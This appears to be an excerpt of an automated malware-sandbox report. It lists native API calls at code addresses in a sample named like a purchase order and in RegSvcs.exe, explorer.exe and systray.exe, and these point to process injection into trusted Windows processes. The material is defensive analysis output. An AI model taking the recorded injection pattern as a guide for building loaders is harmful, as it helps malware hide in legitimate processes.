          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0041A40A NtReadFile,9_2_0041A40A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0041A48B NtClose,9_2_0041A48B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_018A2BF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A2B60 NtClose,LdrInitializeThunk,9_2_018A2B60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A2AD0 NtReadFile,LdrInitializeThunk,9_2_018A2AD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A2DD0 NtDelayExecution,LdrInitializeThunk,9_2_018A2DD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A2DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_018A2DF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A2D10 NtMapViewOfSection,LdrInitializeThunk,9_2_018A2D10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A2D30 NtUnmapViewOfSection,LdrInitializeThunk,9_2_018A2D30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A2CA0 NtQueryInformationToken,LdrInitializeThunk,9_2_018A2CA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A2C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_018A2C70
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A2F90 NtProtectVirtualMemory,LdrInitializeThunk,9_2_018A2F90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A2FB0 NtResumeThread,LdrInitializeThunk,9_2_018A2FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A2FE0 NtCreateFile,LdrInitializeThunk,9_2_018A2FE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A2F30 NtCreateSection,LdrInitializeThunk,9_2_018A2F30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A2E80 NtReadVirtualMemory,LdrInitializeThunk,9_2_018A2E80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,9_2_018A2EA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A4340 NtSetContextThread,9_2_018A4340
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A4650 NtSuspendThread,9_2_018A4650
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A2B80 NtQueryInformationFile,9_2_018A2B80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A2BA0 NtEnumerateValueKey,9_2_018A2BA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A2BE0 NtQueryValueKey,9_2_018A2BE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A2AB0 NtWaitForSingleObject,9_2_018A2AB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A2AF0 NtWriteFile,9_2_018A2AF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A2DB0 NtEnumerateKey,9_2_018A2DB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A2D00 NtSetInformationFile,9_2_018A2D00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A2CC0 NtQueryVirtualMemory,9_2_018A2CC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A2CF0 NtOpenProcess,9_2_018A2CF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A2C00 NtQueryInformationProcess,9_2_018A2C00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A2C60 NtCreateKey,9_2_018A2C60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A2FA0 NtQuerySection,9_2_018A2FA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A2F60 NtCreateProcessEx,9_2_018A2F60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A2EE0 NtQueueApcThread,9_2_018A2EE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A2E30 NtWriteVirtualMemory,9_2_018A2E30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A3090 NtSetValueKey,9_2_018A3090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A3010 NtOpenDirectoryObject,9_2_018A3010
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A35C0 NtCreateMutant,9_2_018A35C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A39B0 NtGetContextThread,9_2_018A39B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A3D10 NtOpenProcessToken,9_2_018A3D10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A3D70 NtOpenThread,9_2_018A3D70
          Source: C:\Windows\explorer.exeCode function: 10_2_10475E12 NtProtectVirtualMemory,10_2_10475E12
          Source: C:\Windows\explorer.exeCode function: 10_2_10474232 NtCreateFile,10_2_10474232
          Source: C:\Windows\explorer.exeCode function: 10_2_10475E0A NtProtectVirtualMemory,10_2_10475E0A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA2CA0 NtQueryInformationToken,LdrInitializeThunk,14_2_04BA2CA0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA2C70 NtFreeVirtualMemory,LdrInitializeThunk,14_2_04BA2C70
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA2C60 NtCreateKey,LdrInitializeThunk,14_2_04BA2C60
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA2DF0 NtQuerySystemInformation,LdrInitializeThunk,14_2_04BA2DF0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA2DD0 NtDelayExecution,LdrInitializeThunk,14_2_04BA2DD0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA2D10 NtMapViewOfSection,LdrInitializeThunk,14_2_04BA2D10
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,14_2_04BA2EA0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA2FE0 NtCreateFile,LdrInitializeThunk,14_2_04BA2FE0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA2F30 NtCreateSection,LdrInitializeThunk,14_2_04BA2F30
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA2AD0 NtReadFile,LdrInitializeThunk,14_2_04BA2AD0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,14_2_04BA2BF0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA2BE0 NtQueryValueKey,LdrInitializeThunk,14_2_04BA2BE0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA2B60 NtClose,LdrInitializeThunk,14_2_04BA2B60
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA35C0 NtCreateMutant,LdrInitializeThunk,14_2_04BA35C0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA4650 NtSuspendThread,14_2_04BA4650
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA4340 NtSetContextThread,14_2_04BA4340
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA2CF0 NtOpenProcess,14_2_04BA2CF0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA2CC0 NtQueryVirtualMemory,14_2_04BA2CC0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA2C00 NtQueryInformationProcess,14_2_04BA2C00
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA2DB0 NtEnumerateKey,14_2_04BA2DB0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA2D30 NtUnmapViewOfSection,14_2_04BA2D30
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA2D00 NtSetInformationFile,14_2_04BA2D00
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA2E80 NtReadVirtualMemory,14_2_04BA2E80
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA2EE0 NtQueueApcThread,14_2_04BA2EE0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA2E30 NtWriteVirtualMemory,14_2_04BA2E30
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA2FB0 NtResumeThread,14_2_04BA2FB0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA2FA0 NtQuerySection,14_2_04BA2FA0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA2F90 NtProtectVirtualMemory,14_2_04BA2F90
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA2F60 NtCreateProcessEx,14_2_04BA2F60
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA2AB0 NtWaitForSingleObject,14_2_04BA2AB0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA2AF0 NtWriteFile,14_2_04BA2AF0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA2BA0 NtEnumerateValueKey,14_2_04BA2BA0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA2B80 NtQueryInformationFile,14_2_04BA2B80
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA3090 NtSetValueKey,14_2_04BA3090
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA3010 NtOpenDirectoryObject,14_2_04BA3010
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA3D10 NtOpenProcessToken,14_2_04BA3D10
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA3D70 NtOpenThread,14_2_04BA3D70
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04BA39B0 NtGetContextThread,14_2_04BA39B0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_029EA360 NtCreateFile,14_2_029EA360
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_029EA490 NtClose,14_2_029EA490
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_029EA410 NtReadFile,14_2_029EA410
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_029EA540 NtAllocateVirtualMemory,14_2_029EA540
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_029EA3B2 NtCreateFile,14_2_029EA3B2
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_029EA35B NtCreateFile,14_2_029EA35B
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_029EA48B NtClose,14_2_029EA48B
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_029EA40A NtReadFile,14_2_029EA40A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0497A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread,14_2_0497A036
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04979BAF NtCreateSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,14_2_04979BAF
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0497A042 NtQueryInformationProcess,14_2_0497A042
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_04979BB2 NtCreateSection,NtMapViewOfSection,14_2_04979BB2
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeCode function: 0_2_04E255880_2_04E25588
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeCode function: 0_2_04E24D180_2_04E24D18
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeCode function: 0_2_04E2EFD80_2_04E2EFD8
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeCode function: 0_2_04E248E00_2_04E248E0
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeCode function: 0_2_04E251500_2_04E25150
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeCode function: 0_2_04E272780_2_04E27278
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeCode function: 0_2_058BDD700_2_058BDD70
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeCode function: 0_2_058B93380_2_058B9338
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeCode function: 0_2_058BD5100_2_058BD510
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeCode function: 0_2_058B94CB0_2_058B94CB
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeCode function: 0_2_058B64080_2_058B6408
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeCode function: 0_2_058B64180_2_058B6418
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeCode function: 0_2_058B6F500_2_058B6F50
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeCode function: 0_2_058B6F600_2_058B6F60
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeCode function: 0_2_058BCF600_2_058BCF60
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeCode function: 0_2_058B46B00_2_058B46B0
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeCode function: 0_2_058B46C00_2_058B46C0
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeCode function: 0_2_058B93280_2_058B9328
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004010309_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0041D8C49_2_0041D8C4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0041EB719_2_0041EB71
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00402D889_2_00402D88
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00402D909_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0041DE5E9_2_0041DE5E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00409E609_2_00409E60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00402FB09_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_019241A29_2_019241A2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_019301AA9_2_019301AA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_019281CC9_2_019281CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018601009_2_01860100
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0190A1189_2_0190A118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018F81589_2_018F8158
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_019020009_2_01902000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_019303E69_2_019303E6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0187E3F09_2_0187E3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0192A3529_2_0192A352
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018F02C09_2_018F02C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_019102749_2_01910274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_019305919_2_01930591
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018705359_2_01870535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0191E4F69_2_0191E4F6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_019144209_2_01914420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_019224469_2_01922446
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0186C7C09_2_0186C7C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018947509_2_01894750
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018707709_2_01870770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188C6E09_2_0188C6E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018729A09_2_018729A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0193A9A69_2_0193A9A6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018869629_2_01886962
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018568B89_2_018568B8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189E8F09_2_0189E8F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018728409_2_01872840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0187A8409_2_0187A840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01926BD79_2_01926BD7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0192AB409_2_0192AB40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0186EA809_2_0186EA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01888DBF9_2_01888DBF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0186ADE09_2_0186ADE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0187AD009_2_0187AD00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0190CD1F9_2_0190CD1F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01910CB59_2_01910CB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01860CF29_2_01860CF2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01870C009_2_01870C00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018EEFA09_2_018EEFA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01862FC89_2_01862FC8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0187CFE09_2_0187CFE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01912F309_2_01912F30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018B2F289_2_018B2F28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01890F309_2_01890F30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E4F409_2_018E4F40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0192CE939_2_0192CE93
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01882E909_2_01882E90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0192EEDB9_2_0192EEDB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0192EE269_2_0192EE26
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01870E599_2_01870E59
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0187B1B09_2_0187B1B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A516C9_2_018A516C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0185F1729_2_0185F172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0193B16B9_2_0193B16B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018770C09_2_018770C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0191F0CC9_2_0191F0CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0192F0E09_2_0192F0E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_019270E99_2_019270E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018B739A9_2_018B739A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0192132D9_2_0192132D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0185D34C9_2_0185D34C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018752A09_2_018752A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188B2C09_2_0188B2C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_019112ED9_2_019112ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0190D5B09_2_0190D5B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_019395C39_2_019395C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_019275719_2_01927571
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0192F43F9_2_0192F43F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018614609_2_01861460
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0192F7B09_2_0192F7B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_019216CC9_2_019216CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018B56309_2_018B5630
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_019059109_2_01905910
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018799509_2_01879950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188B9509_2_0188B950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018738E09_2_018738E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018DD8009_2_018DD800
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188FB809_2_0188FB80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018ADBF99_2_018ADBF9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E5BF09_2_018E5BF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0192FB769_2_0192FB76
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018B5AA09_2_018B5AA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01911AA39_2_01911AA3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0190DAAC9_2_0190DAAC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0191DAC69_2_0191DAC6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01927A469_2_01927A46
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0192FA499_2_0192FA49
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E3A6C9_2_018E3A6C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188FDC09_2_0188FDC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01873D409_2_01873D40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01921D5A9_2_01921D5A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01927D739_2_01927D73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0192FCF29_2_0192FCF2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E9C329_2_018E9C32
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01871F929_2_01871F92
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0192FFB19_2_0192FFB1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01833FD29_2_01833FD2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01833FD59_2_01833FD5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0192FF099_2_0192FF09
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01879EB09_2_01879EB0
          Source: C:\Windows\explorer.exeCode function: 10_2_1035C03610_2_1035C036
          Source: C:\Windows\explorer.exeCode function: 10_2_1035308210_2_10353082
          Source: C:\Windows\explorer.exeCode function: 10_2_1035A91210_2_1035A912
          Source: C:\Windows\explorer.exeCode function: 10_2_10354D0210_2_10354D02
          Source: C:\Windows\explorer.exeCode function: 10_2_103605CD10_2_103605CD
          Source: C:\Windows\explorer.exeCode function: 10_2_1035D23210_2_1035D232
          Source: C:\Windows\explorer.exeCode function: 10_2_10357B3010_2_10357B30
          Source: C:\Windows\explorer.exeCode function: 10_2_10357B3210_2_10357B32
          Source: C:\Windows\explorer.exeCode function: 10_2_1047423210_2_10474232
          Source: C:\Windows\explorer.exeCode function: 10_2_1047303610_2_10473036
          Source: C:\Windows\explorer.exeCode function: 10_2_1046A08210_2_1046A082
          Source: C:\Windows\explorer.exeCode function: 10_2_1046BD0210_2_1046BD02
          Source: C:\Windows\explorer.exeCode function: 10_2_1047191210_2_10471912
          Source: C:\Windows\explorer.exeCode function: 10_2_1046EB3210_2_1046EB32
